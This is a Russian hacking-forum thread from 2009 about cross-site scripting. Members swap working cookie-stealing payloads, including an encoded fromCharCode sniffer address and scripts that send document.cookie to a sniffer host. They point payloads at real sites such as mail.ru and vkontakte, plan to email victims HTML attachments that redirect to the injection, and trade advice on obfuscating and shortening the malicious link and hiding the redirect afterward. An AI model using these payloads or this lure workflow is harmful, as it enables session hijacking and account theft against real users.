RE: Пассивные и Активные XSS - теория и практика
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 19:40:13.806666
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
ORIGINAL: papst
Pashkela - вот на http://na-s.ru там есть xss снифер…и с помощью открытки на mail.ru можно стащить cookies…надо послать жертве открытку со снифером как ето ???
и чтоб стащить cookies…
ты этим кукисы не стащишь
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 20:13:27.383333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: papst
.и с помощью открытки на mail.ru можно стащить cookies.
Таки чтобы это сделать, надо найти XSS не где-нибудь, а на mail.ru
Ты уже сделал это?:D
И совет - юзать надо свои сниферы, ссылка на рабочий снифер в 1-ом посте темы в самом низу. Не надо делиться приватной информацией со всеми, кому не лень
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-11 05:33:19.100000
|
|
|
Gayger
Сообщений: 6
Оценки: 0
Присоединился: 2008-12-16 00:49:49.093333
|
<!– Web.Config Configuration File –>
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
<!– Web.Config Configuration File –>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
…кто нибудь подскажет как это понять(пробовал применить вот такого содержания: <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-11 05:57:25.703333
|
|
|
Gayger
Сообщений: 6
Оценки: 0
Присоединился: 2008-12-16 00:49:49.093333
|
quote:
ORIGINAL: Gayger
<!– Web.Config Configuration File –>
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
<!– Web.Config Configuration File –>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
…кто нибудь подскажет как это понять(пробовал применить вот такого содержания: <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
при сканировании сервака,есть уязвимость на ошибку в скрипте
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-20 19:43:36.426666
|
|
|
Delphihacker
Сообщений: 46
Оценки: 0
Присоединился: 2008-07-15 18:30:02.826666
|
Супер
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-20 21:35:09.853333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
ребята тут вот нашол хсс первая строка филтруется я так понял, потому-что выходит два окошка алерта а должно быть три и пробовал вместо ;alert(String.fromCharCode(88,83,83)) прописать это alert(document.write(document.cookies)) пишeт undefined
вопрос как изменить тут строчки скрипта и сделать редирект на сниффер получится с этим?
;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//–%3E%3C/sсriрt%3E%22%3E'%3E%3Csсriрt%3Ealert(String.fromCharCode(88,83,83))%3C/sсriрt%3E=&{}
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-20 23:53:36.150000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
document.cocie - это чо? Хоцкер, тем более XSS-ер, как минимум не ошибается
ЗЫЖ COOKIE
а если еще правильнее, то document.cookies
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 02:03:41.710000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
ну все таки если не смотреть на ошибки возможно ли сделать сылку на сниффер таким скриптом как-нить?
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 02:06:15.230000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
ссылку в студию, иначе иди в тридевятое царство
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 02:21:52.486666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
ЧУРКО-САЙТ
ссылку можете выбирать любую не трогая чат и форум ,там пусто ,а вот начиная отсюда тут рулит хss.
http://dwap.tj/read/index.php?mod=txt&action=read&n=0&d=dwap_Islam%2Fdwap_5_Molenie_v_dome_AL-ARKAMA.txt&str_p=2500;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//–%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}
скрипт снимать нужно отсюда весь.
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 15:04:59.520000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
вопрос чем кодируют эти цифры (как закодировать адрес сниффера какой прогой если есть у кого скиньте плз)
“><script>img=new/**/Image();a=String.fromCharCode(104,116,116,112,58,47,47,99,108,97,119,115,46,108,105,111,110,115,46,115,117,47,115,110,105,102,102,47,115);img.src=a+document.cookie</script>
Где String.fromCharCode(104,116,116,112,58,47,47,99,108,97,119,115,46,108,105,111,110,115,46,115,117,47,115,110,105,102,102,47,115)
закодированный адрес сниффера
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 15:27:32.730000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
bobik23, можно написать простейший скрипт, можно воспользоватся уже готовым:
http://quest.fsb-my.name/code.php
Пункт 15 - ASCII -> String.fromCharCode()
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 16:25:03.640000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://pashkela.narod.ru/progi/Text2HEX.rar - под винды
пароль-123
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-21 17:36:13.400000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
спасибо!выручили круто .
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-25 22:50:43.383333
|
|
|
Skayder
Сообщений: 82
Оценки: 0
Присоединился: 2008-12-19 12:58:40.493333
|
quote:
ORIGINAL: papst
Pashkela - вот на http://na-s.ru там есть xss снифер…и с помощью открытки на mail.ru можно стащить cookies…надо послать жертве открытку со снифером как ето ???
и чтоб стащить cookies…
ты этим кукисы не стащишь
_____________________________
quote:
ORIGINAL: papst
.и с помощью открытки на mail.ru можно стащить cookies.
Таки чтобы это сделать, надо найти XSS не где-нибудь, а на mail.ru
Ты уже сделал это?
И совет - юзать надо свои сниферы, ссылка на рабочий снифер в 1-ом посте темы в самом низу. Не надо делиться приватной информацией со всеми, кому не лень
________________________
FriLL и Pashkela
Ребят..чёт мне стадно за вас ) С какого хуй *извените за выражение* нужна XSS нв mail.ru ? Если открыть картинку с мыла..то в картинке *у которой формат IMG* сработает скрипт *редерект на снифф* тем самым мы получаем КУКИ мыла….БОльше не порите чушь, если незнаете на сто процентов..
Можете качнуть видео с моим примером как всё делать! Качать ТУТ!
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-25 23:05:12.270000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
во как зарядил…..
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-26 00:11:13.900000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
2 Skayder:
При просмотре через браузер - да. Как думаешь, через The Bat сработает?:)
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-26 01:06:12.250000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Skayder
quote:
ORIGINAL: papst
Pashkela - вот на http://na-s.ru там есть xss снифер…и с помощью открытки на mail.ru можно стащить cookies…надо послать жертве открытку со снифером как ето ???
и чтоб стащить cookies…
ты этим кукисы не стащишь
_____________________________
quote:
ORIGINAL: papst
.и с помощью открытки на mail.ru можно стащить cookies.
Таки чтобы это сделать, надо найти XSS не где-нибудь, а на mail.ru
Ты уже сделал это?
И совет - юзать надо свои сниферы, ссылка на рабочий снифер в 1-ом посте темы в самом низу. Не надо делиться приватной информацией со всеми, кому не лень
________________________
FriLL и Pashkela
Ребят..чёт мне стадно за вас ) С какого хуй *извените за выражение* нужна XSS нв mail.ru ? Если открыть картинку с мыла..то в картинке *у которой формат IMG* сработает скрипт *редерект на снифф* тем самым мы получаем КУКИ мыла….БОльше не порите чушь, если незнаете на сто процентов..
Можете качнуть видео с моим примером как всё делать! Качать ТУТ!
Вы спрашиваете "С какого хуй *извените за выражение* нужна XSS нв mail.ru ?" так то что вы описали и есть xss найденая,не вами и описание ее было ещё в нестоль далёком 2008, 4 октября на вебхакере,позже метод был доработан ponchikom на ачате ,ну а вы уже пересняли видио и написали свой говно-пост ради рекламы ещё одного говно шаблона на юкозе + вам "стадно" за довольно таки знающих людей + нарушили правила(мат даже в криптованой форме запрещён)….В общем мне не затруднит поставить вам минус за такие вот высказывания…
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-26 15:52:09.610000
|
|
|
Skayder
Сообщений: 82
Оценки: 0
Присоединился: 2008-12-19 12:58:40.493333
|
S00pY – Так в чём проблемы тогда? Зачем писать тупость ) Ненадо меня учить нечему,. я всему учусь сам, для меня параллельно кто там где что нашёл! В любом случае для себя это нашёл я!
И слушай мальчик, можеш закопать меня в этих минусах, у меня от этого МОЗГА не уменьшиться..Были-бы знающие люди не писали бы то, что даже мне **ПО ТВОЕМУ*, НЕДОРАЗВЕТОМУ человеку* было стыдно и смешно! + мат непроблема, + за это извенился! - бывает спотыкаюсь ) - Про видео траблу можеш не разводить, снимал в спешке, показать парню что к чему… + Не тупы так пймут
Pashkela – Через мышь конечно нет )) Но в бате есть полно других дыр ;) и - *плагиат прям)* если честно давно не встречал людей которые пользуються TheBat и всякими там оутглюками [:o]
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-27 01:18:15.140000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Skayder
S00pY – Так в чём проблемы тогда? Зачем писать тупость ) Ненадо меня учить нечему,. я всему учусь сам, для меня параллельно кто там где что нашёл! В любом случае для себя это нашёл я!
И слушай мальчик, можеш закопать меня в этих минусах, у меня от этого МОЗГА не уменьшиться..Были-бы знающие люди не писали бы то, что даже мне **ПО ТВОЕМУ*, НЕДОРАЗВЕТОМУ человеку* было стыдно и смешно! + мат непроблема, + за это извенился! - бывает спотыкаюсь ) - Про видео траблу можеш не разводить, снимал в спешке, показать парню что к чему… + Не тупы так пймут
Pashkela – Через мышь конечно нет )) Но в бате есть полно других дыр ;) и - *плагиат прям)* если честно давно не встречал людей которые пользуються TheBat и всякими там оутглюками [:o]
Уважаемый МужчинА,никого закапывать я не собираюсь и не опускаюсь так низко, что-бы оскорбить вас…
Насчёт "**ПО ТВОЕМУ*, НЕДОРАЗВЕТОМУ человеку*" укажите в моём посте хотябы на то что я намекнул на ващу недоразвитость.
"S00pY – Так в чём проблемы тогда? Зачем писать тупость" ээммм где тупость то?Человек написал,он хочет увести "печенье",ему ответили нужен xss,так же указали что с помощью одной открытки,это сделать не удасться…что из выше сказаного тупость?
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-27 22:48:22.586666
|
|
|
Fraqter
Сообщений: 123
Оценки: 0
Присоединился: 2009-01-26 21:17:05.456666
|
==========
Разобрался…
==========
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-02-03 01:55:36.560000
|
|
|
energie14rus
Сообщений: 61
Оценки: 0
Присоединился: 2009-01-05 20:03:31.756666
|
выложите еще разок видео с созданием сниффера плиз:)
|
|
|
|
|
- - 2009-02-11 13:00:41.943333
|
|
|
Vladcasl
Сообщений: 90
Оценки: 0
Присоединился: 2008-01-09 10:00:10.776666
|
-
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-02-26 18:40:02.870000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
[вот еще вопрос если есть xss как найти в таком случаи sql injection ,или это не совместимо извеняюсь если не так задал вопрос.
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-02-26 20:47:04.086666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
xss и sql-inj - две абсолютные разные уязвимости, лишь в единичных случаях наличие xss в том или ином параметре может свидетелствовать о наличие sql-inj, и то, после просмотра исходников
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-02-26 22:51:32.846666
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
народ чесно простити pliz за такую тупость но я вот непойму куда этот скрипт вставить "><sсriрt>alert()</sсriрt> вот кпримеру я нашол форум зарегелся тама затем нажимаю поиск и в окно поиска вводить "><sсriрt>alert()</sсriрt> умя просто пишет данной темы ненайдено… и вот ещё такое я кпримеру вставляю себе в подпись <> и когда смотрю html код умя в подписи показывает не <> а какието странные закорючки) эт значит фильтр там робит? заранее благодарю за ответы….
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-02-27 00:41:08.720000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Lorden
эт значит фильтр там робит?
умница
|
|
|
|
|
RE: чьи кукисы - 2009-02-27 18:08:29.700000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
подскажити будит ли:
<td class="row1"><span class="gen">Откуда:</span></td>
<td class="row2">
<input type="text" class="post"style="width: 200px" name="location" size="25" maxlength="100" value=""><sсriрt>alert()</sсriрt>" />
XSS уязвимостью? там вродебы есть alert() как было описано но скрипт был фильтрован…
|
|
|
|
|
RE: чьи кукисы - 2009-02-28 04:43:22.403333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
quote:
или ставь так "><sсriрt>alert(/xss/)</sсriрt>
"><sсriрt>alert("xss")</sсriрt>
Разница иба………я
|
|
|
|
|
RE: чьи кукисы - 2009-02-28 09:26:06.533333
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: bobik23
а че нельзя адресочек скинуть ,кидай свой сайт сюда ,прозвоню быстро .
или ставь так "><sсriрt>alert(/xss/)</sсriрt>
"><sсriрt>alert("xss")</sсriрt>
сайт l2.sttlt.ru но хз будит ли увас заходить нанего….
П.С. кому нежалко подскажити сайт где работает какаянить уязвимость типо "><sсriрt>alert("xss")</sсriрt>, ато охото посмотреть как она должна работать…)
|
|
|
|
|
RE: чьи кукисы - 2009-02-28 18:04:33.556666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
врятли что ты там сможешь сделать на этом сайте я так полагаю ,там филтра буквально на все, даже на слово алерт ,если только это попробуй Encoding Calculator http://ha.ckers.org/xss.html ,или у них на форуме под их версии phpBB есть сплоиты по этому делу в инете,
—————————————————————————————————————————————–
вовсяком случае есть тут на форуме люди более опытные в этом деле,а тренировки предлагаю на http://www.gala.net/
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-03-10 23:57:57.200000
|
|
|
Napster_X
Сообщений: 3
Оценки: 0
Присоединился: 2009-03-03 00:29:35.993333
|
п.1
Есть XSS уязвимость в поле "ФИЛЬТР" по адрессу http://vkontakte.ru/groups.php?id=*******. Ввожу туда <script>alert()</script> всё работает, но когда ввожу <script>img = new Image(); img.src = "http://sniffer.*********/smiles/img1.gif?"+document.cookie;</script> куки на снифер не приходят, туда вообще ни чего не приходит((((((
п.2
юзая пост #19 получился 1.html вот он:
<html>
<body>
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=http://vkontakte.ru/******?+document.cookie; <script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img_2_284.gif?"+document.cookie;</script>"+document.cookie;>
</body>
</html> при переходи на 1.html появляется текст: +document.cookie;> потом грузится страничка КОНТАКТа и на снифер приходят "пустые поля"(тоже самое если прямо в адрессе написать скрипт на снифер)
п.3
Открываю исходный код страницы КОНТАКТа(с моим id) вписываю туда скрипт на снифер, обновляю и на снифер уходят мои кукися. всё работает.
В чем заключается моя тупость? как добится результата п.3
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-03-11 01:58:15.800000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
1. Зашифровать ссылку со злокодом
2. Зделать злоссылку короче
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-03-12 14:31:50.023333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
вообщем такой вопрос нашел сегодня на яндексе хss ,сделал ссылку на сниффер все работает куки идут ну как сделать чтоб жертва не видела ссылку Tam где происходит угон kukov (хss), значит я делаю так, этот скрипт сворачиваю в html файл <sсriрt language="Javasсriрt">
document.location.href="http://blabla.narod.ru/bla.html"
</sсriрt>
и закидываю вместе с письмом к жертве на мыло ,после как жертва откроет прикреплённый наш файл допустим назовем его Заказ от 5.html и естeствено жеpтву перебросит туда где должно исполнится наше хss,как тут сделать второй редирект ну типа таkо-го как ссылка на угон кукисов а после переброс на страницу с тюльпанами.
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-03-13 18:47:45.560000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=SEp&ei=_H-6Sar7GtmOsAasrrXoDg&sa=X&oi=spell&resnum=1&ct=result&cd=1&q=redirect&spell=1
|
|
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-03-14 01:37:31.470000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
в код самого снифера вставь:
header("Location: http://rambler.ru");
или
<script>history.go(-1)</script> //возвращает туда, откуда пришли
|
|
|
|
|
|
